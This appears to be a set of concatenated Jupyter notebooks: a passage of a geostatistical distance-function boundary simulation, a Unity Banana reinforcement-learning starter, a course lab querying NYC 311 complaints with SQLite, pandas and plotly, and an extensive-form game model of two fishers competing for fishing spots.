### Determine the $c$ parameter
Normally the optimal $c$ would be calculated using a jackknife study, but it is simply provided here.
```
selected_c = 200
```
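As a sketch of what such a jackknife study might look like: each candidate $C$ is scored by leave-one-out error and the minimizer is kept. The scoring function `boundary_error` below is a hypothetical stand-in (in practice it would re-estimate the boundary without the held-out datum and check whether that datum is classified correctly):

```python
import numpy as np

def jackknife_select_c(n_data, candidates, boundary_error):
    """Pick the C that minimizes the mean leave-one-out error.

    boundary_error(c, train_idx, test_idx) is a user-supplied scorer
    (hypothetical here) returning the error for one held-out datum.
    """
    all_idx = np.arange(n_data)
    mean_errors = []
    for c in candidates:
        errs = [boundary_error(c, np.delete(all_idx, i), i)
                for i in range(n_data)]
        mean_errors.append(np.mean(errs))
    return candidates[int(np.argmin(mean_errors))]

# Toy scorer whose error happens to be minimized at C = 200
toy_error = lambda c, train_idx, test_idx: (c - 200) ** 2
best_c = jackknife_select_c(10, [100, 150, 200, 250], toy_error)
print(best_c)  # -> 200
```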
### Calculate the $df$ at the data locations
```
dfcalc = gs.Program(exe_dir+'dfcalc')
# Print the columns for populating the parameter file without variables
print(dat.columns)
parstr = """ Parameters for DFCalc
*********************
START OF PARAMETERS:
{datafl} -file with input data
1 2 3 0 4 -column for DH,X,Y,Z,Ind
1 -in code: indicator for inside domain
0.0 0.0 0.0 -angles for anisotropy ellipsoid
1.0 1.0 -first and second anisotropy ratios (typically <=1)
0 -proportion of drillholes to remove
696969 -random number seed
{c} -C
{outfl} -file for distance function output
'nofile.out' -file for excluded drillholes output
"""
pars = dict(datafl=dat.flname, c=selected_c,
outfl=os.path.join(outdir,'df_calc.out'))
dfcalc.run(parstr=parstr.format(**pars))
```
### Manipulate the $df$ data before plotting
A standard naming convention of the distance function variable is used for convenience in the workflow, motivating the manipulation.
```
# Load the data and note the abbreviated name of the distance function
dat_df = gs.DataFile(os.path.join(outdir,'df_calc.out'), notvariables='Ind', griddef=gs.Parameters['data.griddef'])
print('Initial distance Function variable name = ', dat_df.variables)
# Set a standard distance function name
dfvar = 'Distance Function'
dat_df.rename({dat_df.variables:dfvar})
print('Distance Function variable name = ', dat_df.variables)
# Set symmetric color limits for the distance function
df_vlim = (-350, 350)
gs.location_plot(dat_df, vlim=df_vlim, cbar_label='m')
```
### Estimate the $df$ across the grid
Kriging is performed with a large number of data to provide a smooth and conditionally unbiased estimate. Global kriging would also be appropriate.
```
kd3dn = gs.Program(exe_dir+'kt3dn')
varmodelfit_outfl_g
parstr = """ Parameters for KT3DN
********************
START OF PARAMETERS:
{input_file} -file with data
1 2 3 0 6 0 - columns for DH,X,Y,Z,var,sec var
-998.0 1.0e21 - trimming limits
0 -option: 0=grid, 1=cross, 2=jackknife
xvk.dat -file with jackknife data
1 2 0 3 0 - columns for X,Y,Z,vr and sec var
nofile.out -data spacing analysis output file (see note)
0 15.0 - number to search (0 for no dataspacing analysis, rec. 10 or 20) and composite length
0 100 0 -debugging level: 0,3,5,10; max data for GSKV;output total weight of each data?(0=no,1=yes)
{out_sum} -file for debugging output (see note)
{out_grid} -file for kriged output (see GSB note)
{gridstr}
1 1 1 -x,y and z block discretization
1 100 100 1 -min, max data for kriging,upper max for ASO,ASO incr
0 0 -max per octant, max per drillhole (0-> not used)
700.0 700.0 500.0 -maximum search radii
0.0 0.0 0.0 -angles for search ellipsoid
1 -0=SK,1=OK,2=LVM(resid),3=LVM((1-w)*m(u))),4=colo,5=exdrift,6=ICCK
0.0 0.6 0.8 1.6 - mean (if 0,4,5,6), corr. (if 4 or 6), var. reduction factor (if 4)
0 0 0 0 0 0 0 0 0 -drift: x,y,z,xx,yy,zz,xy,xz,zy
0 -0, variable; 1, estimate trend
extdrift.out -gridded file with drift/mean
4 - column number in gridded file
keyout.out -gridded file with keyout (see note)
0 1 - column (0 if no keyout) and value to keep
{varmodelstr}
"""
with open(varmodelfit_outfl_g, 'r') as f:
varmodel_ = f.readlines()
varstr = ''''''
for line in varmodel_:
varstr += line
pars = dict(input_file=os.path.join(outdir,'df_calc.out'),
out_grid=os.path.join(outdir,'kt3dn_df.out'),
out_sum=os.path.join(outdir,'kt3dn_sum.out'),
gridstr=gs.Parameters['data.griddef'], varmodelstr=varstr)
kd3dn.run(parstr=parstr.format(**pars))
```
### Manipulate and plot the $df$ estimate
`slice_plot` colors the overlain `dat_df` point data by the same variable, since its name matches the column name of `est_df`.
```
est_df = gs.DataFile(os.path.join(outdir,'kt3dn_df.out'))
# Drop the variance since we won't be using it,
# allowing for specification of the column to be avoided
est_df.drop('EstimationVariance')
# Rename to the standard distance function name for convenience
est_df.rename({est_df.variables:dfvar})
est_df.describe()
# Generate a figure object
fig, axes = gs.subplots(1, 2, figsize=(10, 8),cbar_mode='each',
axes_pad=0.8, cbar_pad=0.1)
# Location map of indicator data for comparison
gs.location_plot(dat, ax=axes[0])
# Map of distance function data and estimate
gs.slice_plot(est_df, pointdata=dat_df,
pointkws={'edgecolors':'k', 's':25},
cbar_label='Distance Function (m)', vlim=df_vlim, ax=axes[1])
```
## 6. Boundary Simulation
This section is subdivided into 4 sub-sections:
1. Draw a uniform probability in $[0, 1)$
2. Transform it into a $df$ deviate with a range of $[-C, C]$
3. Add the $df$ deviates to the $df$ estimate, yielding a $df$ realization
4. Truncate the realization at $df=0$ , generating a realization of the domain indicator
```
# Create a directory for the output
domaindir = os.path.join(outdir, 'Domains/')
gs.mkdir(domaindir)
for real in range(nreal):
    # Draw a uniform probability in [0, 1)
    sim = np.random.rand()
    # Transform the probability to a distance function deviate in [-C, C]
    sim = 2 * selected_c * sim - selected_c
    # Initialize the realization as a copy of the distance function estimate
    # (copying prevents the deviates from accumulating across realizations)
    df = est_df[dfvar].values.copy()
    idx = np.logical_and(df > -selected_c, df < selected_c)
    # Add the distance function deviate to the estimate within the
    # uncertainty band, yielding a distance function realization
    df[idx] = df[idx] + sim
    # A distance function <= 0 means inside the domain, so the indicator is 1
    sim = (df <= 0).astype(int)
# Convert the Numpy array to a Pandas DataFrame, which is required
# for initializing a DataFile (aside from the demonstrated flname approach).
# The DataFile is then written out
sim = pd.DataFrame(data=sim, columns=[dat.cat])
sim = gs.DataFile(data=sim)
sim.write_file(domaindir+'real{}.out'.format(real+1))
```
### Plot the realizations
```
fig, axes = gs.subplots(2, 3, figsize=(15, 8), cbar_mode='single')
for real, ax in enumerate(axes):
sim = gs.DataFile(domaindir+'real{}.out'.format(real+1))
gs.slice_plot(sim, title='Realization {}'.format(real+1),
pointdata=dat,
pointkws={'edgecolors':'k', 's':25},
vlim=(0, 1), ax=ax)
```
## 7. Save project settings and clean the output directory
```
gs.Parameters.save('Parameters.json')
gs.rmdir(outdir) #command to delete generated data file
gs.rmfile('temp')
```
| github_jupyter |
# Navigation
---
Congratulations for completing the first project of the [Deep Reinforcement Learning Nanodegree](https://www.udacity.com/course/deep-reinforcement-learning-nanodegree--nd893)! In this notebook, you will learn how to control an agent in a more challenging environment, where it can learn directly from raw pixels! **Note that this exercise is optional!**
### 1. Start the Environment
We begin by importing some necessary packages. If the code cell below returns an error, please revisit the project instructions to double-check that you have installed [Unity ML-Agents](https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Installation.md) and [NumPy](http://www.numpy.org/).
```
from unityagents import UnityEnvironment
import numpy as np
from collections import deque
import torch
import matplotlib.pyplot as plt
%matplotlib inline
from ddpg_agent_pixels import Agent
from sklearn.manifold import TSNE
```
Next, we will start the environment! **_Before running the code cell below_**, change the `file_name` parameter to match the location of the Unity environment that you downloaded.
- **Mac**: `"path/to/VisualBanana.app"`
- **Windows** (x86): `"path/to/VisualBanana_Windows_x86/Banana.exe"`
- **Windows** (x86_64): `"path/to/VisualBanana_Windows_x86_64/Banana.exe"`
- **Linux** (x86): `"path/to/VisualBanana_Linux/Banana.x86"`
- **Linux** (x86_64): `"path/to/VisualBanana_Linux/Banana.x86_64"`
- **Linux** (x86, headless): `"path/to/VisualBanana_Linux_NoVis/Banana.x86"`
- **Linux** (x86_64, headless): `"path/to/VisualBanana_Linux_NoVis/Banana.x86_64"`
For instance, if you are using a Mac, then you downloaded `VisualBanana.app`. If this file is in the same folder as the notebook, then the line below should appear as follows:
```
env = UnityEnvironment(file_name="VisualBanana.app")
```
```
env = UnityEnvironment(file_name=".\Banana_Windows_x86_64\Banana.exe")
```
Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
```
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
```
### 2. Examine the State and Action Spaces
The simulation contains a single agent that navigates a large environment. At each time step, it has four actions at its disposal:
- `0` - walk forward
- `1` - walk backward
- `2` - turn left
- `3` - turn right
The environment state is an array of raw pixels with shape `(1, 84, 84, 3)`. *Note that this code differs from the notebook for the project, where we are grabbing **`visual_observations`** (the raw pixels) instead of **`vector_observations`**.* A reward of `+1` is provided for collecting a yellow banana, and a reward of `-1` is provided for collecting a blue banana.
Run the code cell below to print some information about the environment.
```
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents in the environment
print('Number of agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Number of actions:', action_size)
# examine the state space
state = env_info.visual_observations[0]
print('States look like:')
plt.imshow(np.squeeze(state))
plt.show()
state_size = state.shape
print('States have shape:', state.shape)
```
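Since the state arrives in NHWC layout (batch, height, width, channels) while a convolutional network in PyTorch expects NCHW, one plausible preprocessing step looks like the following (this is an assumption about how a downstream agent consumes frames, not part of the environment API):

```python
import numpy as np

def preprocess_state(state):
    """Convert a (1, 84, 84, 3) NHWC float frame to (1, 3, 84, 84) NCHW.

    The result can then be wrapped with torch.from_numpy(...) for a CNN.
    """
    state = np.asarray(state, dtype=np.float32)
    return np.transpose(state, (0, 3, 1, 2))

frame = np.random.rand(1, 84, 84, 3)
print(preprocess_state(frame).shape)  # -> (1, 3, 84, 84)
```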
### 3. Take Random Actions in the Environment
In the next code cell, you will learn how to use the Python API to control the agent and receive feedback from the environment.
Once this cell is executed, you will watch the agent's performance, if it selects an action (uniformly) at random with each time step. A window should pop up that allows you to observe the agent, as it moves through the environment.
Of course, you'll have to change the code so that the agent is able to use its experience to gradually choose better actions when interacting with the environment!
```
env_info = env.reset(train_mode=False)[brain_name] # reset the environment
state = env_info.visual_observations[0] # get the current state
score = 0 # initialize the score
while True:
action = np.random.randint(action_size) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.visual_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Score: {}".format(score))
```
When finished, you can close the environment.
```
env.close()
```
### 4. It's Your Turn!
Now it's your turn to train your own agent to solve the environment! When training the environment, set `train_mode=True`, so that the line for resetting the environment looks like the following:
```python
env_info = env.reset(train_mode=True)[brain_name]
```
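A typical training loop has the same shape as the random-action loop above, with the agent's `act` and learning `step` calls swapped in. One possible skeleton is sketched below; the `act`/`step` interface is an assumption about the `Agent` class in `ddpg_agent_pixels`, and trivial stand-ins for the environment and agent are used to keep the sketch self-contained:

```python
import numpy as np

class DummyEnv:
    """Stand-in for the Unity environment, exposing the same loop shape."""
    def reset(self):
        self.t = 0
        return np.zeros((1, 84, 84, 3))
    def step(self, action):
        self.t += 1
        reward = 1.0 if action == 0 else 0.0
        done = self.t >= 10  # fixed-length episodes for this sketch
        return np.zeros((1, 84, 84, 3)), reward, done

class DummyAgent:
    """Stand-in for the pixel-based agent (act/step interface assumed)."""
    def act(self, state, eps):
        # Epsilon-greedy over the 4 discrete actions
        return np.random.randint(4) if np.random.rand() < eps else 0
    def step(self, state, action, reward, next_state, done):
        pass  # a real agent would store the transition and learn from replay

def train(env, agent, n_episodes=20, eps_start=1.0, eps_decay=0.9, eps_min=0.01):
    scores, eps = [], eps_start
    for _ in range(n_episodes):
        state, score, done = env.reset(), 0.0, False
        while not done:
            action = agent.act(state, eps)
            next_state, reward, done = env.step(action)
            agent.step(state, action, reward, next_state, done)
            state, score = next_state, score + reward
        scores.append(score)
        eps = max(eps_min, eps * eps_decay)  # anneal exploration
    return scores

scores = train(DummyEnv(), DummyAgent())
print(len(scores))  # -> 20
```

With the real environment, `env.reset(...)` and `env.step(...)` return `env_info` objects as shown earlier, so the state/reward/done unpacking would follow the random-action cell above.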
| github_jupyter |
# CSE 6040, Fall 2015 [10]: A Large-Data Workflow
This notebook derives from an [awesome demo by the makers of plot.ly](https://plot.ly/ipython-notebooks/big-data-analytics-with-pandas-and-sqlite/).
In particular, this notebook starts with a large database of complaints filed by residents of New York City since 2010 via 311 calls. The full dataset is available at the [NYC open data portal](https://nycopendata.socrata.com/data). At about 6 GB and 10 million complaints, you can infer that a) you might not want to read it all into memory at once, and b) NYC residents are really whiny. (OK, maybe you should only make conclusion "a".) The notebook then combines the use of `sqlite`, `pandas`, and [`Plotly`](https://plot.ly/python/) to build _interactive_ visualizations. So it's a great way to exercise several of the things we've learned so far in our course!
## Getting started
To complete this notebook, you'll need to get your environment set up. The basic steps are:
1. Set up `plotly`.
2. Download the sample dataset.
**Set up `plotly`.** To do the interactive visualization part of this notebook, you'll need to install `plotly` and sign up for an online `plotly` account. From the command-line on your system, you can do this by running:
pip install plotly
From within this notebook, you might also be able to accomplish the same thing by running the following inside the notebook.
> The following example is for a default Mac OS X install of Anaconda; you may need to edit it for other systems.
```
!pip install plotly
```
The `plotly` service requires access to their servers.
To get started, you will need to sign up for a `plotly` account, if you haven't done so already, at:
https://plot.ly/
It's free! Well, to the extent that any too-good-to-be-true web service is "free."
Once you've done that, figure out what your API key is by visiting:
https://plot.ly/settings/api
Lastly, sign into the `plotly` servers from within your notebook as follows.
> Please modify this code to use your own username and API key.
```
import plotly.plotly as py
py.sign_in ('USERNAME', 'APIKEY')
```
Next, as a quick test let's make a simple plot using the "baby names" data set from [Lab 8](http://nbviewer.ipython.org/github/rvuduc/cse6040-ipynbs/blob/master/08--pandas-seaborn.ipynb).
```
import pandas as pd
# Build a Pandas data frame
names = ['Bob','Jessica','Mary','John','Mel']
births = [968, 155, 77, 578, 973]
BabyDataSet = list(zip(names, births))  # list() needed in Python 3, where zip is lazy
df = pd.DataFrame(data=BabyDataSet, columns=['Names', 'Births'])
df
# Plot, using `plotly`
from plotly.graph_objs import Bar
plot_data = [Bar (x=df.Names, y=df.Births)]
py.iplot (plot_data)
```
**Download a sample dataset.** Next, grab a copy of today's dataset, which is a small (~ 20%) subset of the full dataset:
* [SQLite DB, ~ 257 MiB] http://cse6040.gatech.edu/fa15/NYC-311-2M.db
Connect to this database as you did in the [last lab](http://nbviewer.ipython.org/github/rvuduc/cse6040-ipynbs/blob/master/09--sqlite3.ipynb).
```
# SQLite database filename
DB_FILENAME = 'NYC-311-2M.db'
# Connect
import sqlite3 as db
disk_engine = db.connect (DB_FILENAME)
```
**Preview the data.** This sample database has just a single table, named `data`. Let's query it and see how long it takes to read. To carry out the query, we will use the SQL reader built into `pandas`.
```
import time
print ("Reading ...")
start_time = time.time ()
# Perform SQL query through the disk_engine connection.
# The return value is a pandas data frame.
df = pd.read_sql_query('SELECT * FROM data', disk_engine)
elapsed_time = time.time () - start_time
print ("==> Took %g seconds." % elapsed_time)
# Dump the first few rows
df.head()
```
## More SQL stuff
**Partial queries: `LIMIT` clause.** The preceding command was overkill for what we wanted, which was just to preview the table. Instead, we could have used the `LIMIT` option to ask for just a few results.
```
query = '''
SELECT *
FROM data
LIMIT 5
'''
start_time = time.time ()
df = pd.read_sql_query(query, disk_engine)
elapsed_time = time.time () - start_time
print ("==> LIMIT version took %g seconds." % elapsed_time)
df
```
**Set membership: `IN` operator.** Another common idiom is to ask for rows whose attributes fall within a set, for which you can use the `IN` operator.
```
query = '''
SELECT ComplaintType, Descriptor, Agency
FROM data
WHERE Agency IN ("NYPD", "DOB")
LIMIT 10
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
**Finding unique values: `DISTINCT` qualifier.** Yet another common idiom is to ask for the unique values of some attribute, for which you can use the `DISTINCT` qualifier.
```
query = 'SELECT DISTINCT City FROM data'
df = pd.read_sql_query(query, disk_engine)
print ("Found %d unique cities. The first few are:" % len (df))
df.head()
```
**Renaming columns: `AS` operator.** Sometimes you might want to rename a result column. For instance, the following query counts the number of complaints by "Agency," using the `COUNT(*)` function and `GROUP BY` clause, which we discussed in an earlier lab. If you wish to refer to the counts column of the resulting data frame, you can give it a more "friendly" name using the `AS` operator.
```
query = '''
SELECT Agency, COUNT(*) AS NumComplaints
FROM data
GROUP BY Agency
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
**Ordering results: `ORDER` clause.** You can also order the results. For instance, suppose we want to order the results of the previous query by the number of complaints.
```
query = '''
SELECT Agency, COUNT(*) as NumComplaints
FROM data
GROUP BY Agency
ORDER BY NumComplaints
'''
df = pd.read_sql_query (query, disk_engine)
df.tail ()
```
Note that the above example prints the bottom (tail) of the data frame. You could have also asked for the query results in reverse (descending) order, by prefixing the `ORDER BY` attribute with a `-` (minus) symbol.
```
query = '''
SELECT Agency, COUNT(*) as NumComplaints
FROM data
GROUP BY Agency
ORDER BY -NumComplaints
'''
df = pd.read_sql_query (query, disk_engine)
df.head ()
```
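As an aside, the `-` prefix works here because the count is numeric; the standard SQL spelling for descending order is the `DESC` keyword, which SQLite also supports. A tiny self-contained check using an in-memory database (the toy `data` table and `Agency` column mirror the ones above):

```
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE data (Agency TEXT)")
conn.executemany("INSERT INTO data VALUES (?)",
                 [("NYPD",), ("NYPD",), ("DOB",)])
rows = conn.execute('''
    SELECT Agency, COUNT(*) AS NumComplaints
    FROM data
    GROUP BY Agency
    ORDER BY NumComplaints DESC
''').fetchall()
print(rows)  # most complained-about agency first
```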
And of course we can plot all of this data!
```
py.iplot ([Bar (x=df.Agency, y=df.NumComplaints)],
filename='311/most common complaints by city')
```
**Exercise.** Create a `pandas` data frame that shows the number of complaints for each type, in descending order. What is the most common type of complaint?
```
# Insert your answer here
```
Let's also visualize the result, as a bar chart showing complaint types on the x-axis and the number of complaints on the y-axis. If necessary, modify the `plotly` command below to pull the correct columns from your data frame.
```
py.iplot({
'data': [Bar (x=df.ComplaintType, y=df.NumComplaints)],
'layout': {
'margin': {'b': 150}, # Make the bottom margin a bit bigger to handle the long text
'xaxis': {'tickangle': 40}} # Angle the labels a bit
}, filename='311/most common complaints by complaint type')
```
**Exercise.** Determine the Top 10 whiniest cities. (That is, the 10 cities with the largest numbers of complaints.)
```
# Insert your answer here
query = '''
'''
df = pd.read_sql_query (query, disk_engine)
df.head (10)
```
You should notice two bits of funny behavior, namely, that cities are treated in a _case-sensitive_ manner and that `None` appears as a city. (Presumably this setting occurs when a complaint is non-localized or the city is not otherwise specified.)
**Case-insensitive grouping: `COLLATE NOCASE`.** One way to carry out the preceding query in a case-insensitive way is to add a `COLLATE NOCASE` qualifier to the `GROUP BY` clause.
Let's filter out the 'None' cases as well, while we are at it.
```
query = '''
SELECT City, COUNT(*) AS NumComplaints
FROM data
WHERE City <> 'None'
GROUP BY City COLLATE NOCASE
ORDER BY -NumComplaints
LIMIT 10
'''
df = pd.read_sql_query (query, disk_engine)
df
```
Brooklyn is NYC's whiniest city. I knew it!
Lastly, for later use, let's save the names of just the top 7 cities.
```
TOP_CITIES = df.head (7)['City']
TOP_CITIES
```
## Multiple series in `plotly`
Here is another example of how to use a query to extract data and then recombine the results into a plot.
Suppose we want to look at the number of complaints by type _and_ by city.
Furthermore, suppose we want to render these results as a bar chart with "complaints" along the x-axis and cumulative counts, as stacked bars, along the y-axis, where different bars correspond to different cities. The `plotly` package requires that we create a list of _traces_, where each trace is a series to plot.
Here's how we might construct such a list of traces.
```
traces = []
for city in TOP_CITIES:
    query = '''
      SELECT ComplaintType, COUNT(*) as NumComplaints
        FROM data
        WHERE City = "{}" COLLATE NOCASE
        GROUP BY ComplaintType
        ORDER BY -NumComplaints
    '''.format (city)
    df = pd.read_sql_query (query, disk_engine)
    traces.append (Bar (x=df['ComplaintType'],
                        y=df.NumComplaints,
                        name=city.capitalize()))
```
From this list, we can create the stacked bar chart accordingly.
```
from plotly.graph_objs import Layout
py.iplot({'data': traces,
'layout': Layout (barmode='stack',
xaxis={'tickangle': 40},
margin={'b': 150})},
filename='311/complaints by city stacked')
```
*You can also click on the legend entries to hide/show the traces. Click-and-drag to zoom in and shift-drag to pan.*
**Exercise.** Make a variation of the above stacked bar chart that shows, for each complaint type (x-axis), the _percentage_ of complaints attributed to each city.
Your code should create a new list of traces, `norm_traces`, which the `plotly` code below can then render as the final result.
```
py.iplot({'data': norm_traces,
'layout': Layout(
barmode='stack',
xaxis={'tickangle': 40, 'autorange': False, 'range': [-0.5, 16]},
yaxis={'title': 'Percent of Complaints by City'},
margin={'b': 150},
title='Relative Number of 311 Complaints by City')
}, filename='311/relative complaints by city', validate=False)
```
From the above data, what would you conclude about the various areas of NY city?
### Part 2: SQLite time series with Pandas
###### Filter SQLite rows with timestamp strings: `YYYY-MM-DD hh:mm:ss`
```
query = '''
SELECT ComplaintType, CreatedDate, City
FROM data
WHERE CreatedDate < "2015-09-15 23:59:59"
AND CreatedDate > "2015-09-15 00:00:00"
'''
df = pd.read_sql_query (query, disk_engine)
df
```
###### Pull out the hour unit from timestamps with `strftime`
```
query = '''
SELECT CreatedDate, STRFTIME ('%H', CreatedDate) AS Hour, ComplaintType
FROM data
LIMIT 5
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
###### Count the number of complaints (rows) per hour with `STRFTIME`, `GROUP BY`, and `COUNT(*)`
```
query = '''
SELECT
CreatedDate,
strftime ('%H', CreatedDate) as Hour,
COUNT (*) AS `Complaints per Hour`
FROM data
GROUP BY Hour
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
py.iplot({
'data': [Bar (x=df['Hour'], y=df['Complaints per Hour'])],
'layout': Layout (xaxis={'title': 'Hour in Day'},
yaxis={'title': 'Number of Complaints'})},
filename='311/complaints per hour')
```
###### Filter noise complaints by hour
```
query = '''
SELECT CreatedDate,
STRFTIME ('%H', CreatedDate) AS Hour,
COUNT (*) AS `Complaints per Hour`
FROM data
WHERE ComplaintType LIKE '%Noise%'
GROUP BY Hour
ORDER BY -`Complaints per Hour`
'''
df = pd.read_sql_query (query, disk_engine)
display (df.head(n=2))
py.iplot({
'data': [Bar(x=df['Hour'], y=df['Complaints per Hour'])],
'layout': Layout(xaxis={'title': 'Hour in Day'},
yaxis={'title': 'Number of Complaints'},
title='Number of Noise Complaints in NYC by Hour in Day'
)}, filename='311/noise complaints per hour')
```
###### Segregate complaints by hour
```
complaint_traces = {} # Each series in the graph will represent a complaint
complaint_traces['Other'] = {}

for hour in range(1, 24):
    hour_str = str(hour).zfill(2)  # zero-pad to match STRFTIME's '%H' output
    query = '''
      SELECT CreatedDate,
             ComplaintType,
             STRFTIME ('%H', CreatedDate) AS Hour,
             COUNT (*) AS NumComplaints
        FROM data
        WHERE Hour = "{}"
        GROUP BY ComplaintType
        ORDER BY -NumComplaints
    '''.format (hour_str)
    df = pd.read_sql_query (query, disk_engine)

    complaint_traces['Other'][hour] = sum (df.NumComplaints)

    # Grab the 7 most common complaints for that hour
    for i in range(7):
        complaint = df.at[i, 'ComplaintType']   # .get_value() is deprecated; use .at
        count = df.at[i, 'NumComplaints']
        complaint_traces['Other'][hour] -= count
        if complaint in complaint_traces:
            complaint_traces[complaint][hour] = count
        else:
            complaint_traces[complaint] = {hour: count}

traces = []
for complaint in complaint_traces:
    traces.append({
        'x': list(range(25)),
        'y': [complaint_traces[complaint].get(i, None) for i in range(25)],
        'name': complaint,
        'type': 'bar'
    })

py.iplot({
    'data': traces,
    'layout': {
        'barmode': 'stack',
        'xaxis': {'title': 'Hour in Day'},
        'yaxis': {'title': 'Number of Complaints'},
        'title': 'The 7 Most Common 311 Complaints by Hour in a Day'
    }}, filename='311/most common complaints by hour')
```
##### Aggregated time series
First, create a new column with timestamps rounded to the previous 15 minute interval
```
minutes = 15
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval
FROM data
LIMIT 10
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
display (df.head ())
```
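The arithmetic inside `DATETIME(...)` is worth unpacking: `STRFTIME('%s', ...)` converts the timestamp to Unix seconds, and integer division followed by multiplication floors it to the previous interval boundary. The same trick in plain Python (the timestamp value is an arbitrary example):

```
# Flooring a Unix timestamp to the previous 15-minute boundary,
# exactly as the SQL query above does.
seconds = 15 * 60
ts = 1442336123                      # an arbitrary example Unix timestamp
rounded = (ts // seconds) * seconds  # previous 15-minute mark
print(rounded)
```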
Then, `GROUP BY` that interval and `COUNT(*)`
```
minutes = 15
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval,
COUNT (*) AS `Complaints / Interval`
FROM data
GROUP BY Interval
ORDER BY Interval
LIMIT 500
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
display (df.head ())
display (df.tail ())
py.iplot(
{
'data': [{
'x': df.Interval,
'y': df['Complaints / Interval'],
'type': 'bar'
}],
'layout': {
'title': 'Number of 311 Complaints per 15 Minutes'
}
}, filename='311/complaints per 15 minutes')
hours = 24
minutes = hours*60
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval,
COUNT (*) AS `Complaints / Interval`
FROM data
GROUP BY Interval
ORDER BY Interval
LIMIT 500
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
df.head ()
py.iplot(
{
'data': [{
'x': df.Interval,
'y': df['Complaints / Interval'],
'type': 'bar'
}],
'layout': {
'title': 'Number of 311 Complaints per Day'
}
}, filename='311/complaints per day')
```
### Learn more
- Find more open data sets on [Data.gov](https://data.gov) and [NYC Open Data](https://nycopendata.socrata.com)
- Learn how to setup [MySql with Pandas and Plotly](http://moderndata.plot.ly/graph-data-from-mysql-database-in-python/)
- Add [interactive widgets to IPython notebooks](http://moderndata.plot.ly/widgets-in-ipython-notebook-and-plotly/) for customized data exploration
- Big data workflows with [HDF5 and Pandas](http://stackoverflow.com/questions/14262433/large-data-work-flows-using-pandas)
- [Interactive graphing with Plotly](https://plot.ly/python/)
```
#from IPython.core.display import HTML
#import urllib2
#HTML(urllib2.urlopen('https://raw.githubusercontent.com/plotly/python-user-guide/css-updates/custom.css').read())
```
```
import os
import sys
ngames_path = os.path.abspath(os.path.join(os.getcwd(), '../../..', 'ngames'))
sys.path.append(ngames_path)
import matplotlib.pyplot as plt
from extensivegames import ExtensiveFormGame, plot_game
from build import build_full_game
```
# Default configuration
Both fishers start at the shore. They can go to one of two fishing spots. If the fishers go to different spots, they stay there. If they go to the same spot, they can each choose to stay or leave. If, even after that, both fishers end up at the same spot, they fight. The probability of fisher $i$ winning the fight is given by:
\begin{equation}
P(\text{$i$ wins fight})=\frac{S_i}{\sum_j S_j}
\end{equation}
where $S_i$ denotes the strength of fisher $i$, a parameter between 1 (weakest) and 10 (strongest).
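As a quick sanity check on the formula, here is a minimal sketch (the strength values are made up for illustration):

```
# P(i wins fight) = S_i / sum_j S_j, with hypothetical strengths
strengths = {'alice': 6, 'bob': 4}

def win_probability(strengths, fisher):
    return strengths[fisher] / sum(strengths.values())

print(win_probability(strengths, 'alice'))  # -> 0.6
```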
```
my_fig_kwargs = dict(figsize=(20,10), frameon=False)
my_node_kwargs = dict(font_size=10, node_size=500, edgecolors='k',
linewidths=1.5)
my_edge_kwargs = dict(arrowsize=15, width=1.5)
my_edge_labels_kwargs = dict(font_size=10)
my_patch_kwargs = dict(linewidth=2)
my_legend_kwargs = dict(fontsize=16, loc='upper right', edgecolor='white')
my_info_sets_kwargs = dict(linestyle='--', linewidth=3)
position_colors = {'alice':'aquamarine', 'bob':'greenyellow'}
game = build_full_game('.', 'fishers', threshold=0)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_default.png', bbox_inches='tight', dpi=500)
```
# *First-in-time, first-in-right* configuration
Now the fishers also start from the shore, but if they go to the same fishing spot, the fisher who gets there first is committed to the spot, while the fisher who has lost the race has to leave. The probability that fisher $i$ wins the race when both fishers go to the same spot is:
\begin{equation}
P(\text{$i$ wins race}) = \frac{V_i}{\sum_j V_j}
\end{equation}
where $V_i$ denotes the speed of fisher $i$, a parameter between 1 (slowest) and 10 (fastest).
```
game = build_full_game('.', 'fishers', threshold=1)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_race.png', bbox_inches='tight', dpi=200)
```
# *First-to-announce, first-in-right* configuration
In this configuration, one of the fishers is randomly assigned the position of announcer. While both fishers are at the shore, either one can move before the announcer has declared for a spot. Then, both fishers can go to either spot. If both fishers go to the spot that the announcer has declared, the announcer is guaranteed to win the race to the spot. If both fishers go to the spot that the announcer has not declared, either of them might win the race to get there. The winner of the race is committed to the spot (she stays) while the loser has to leave.
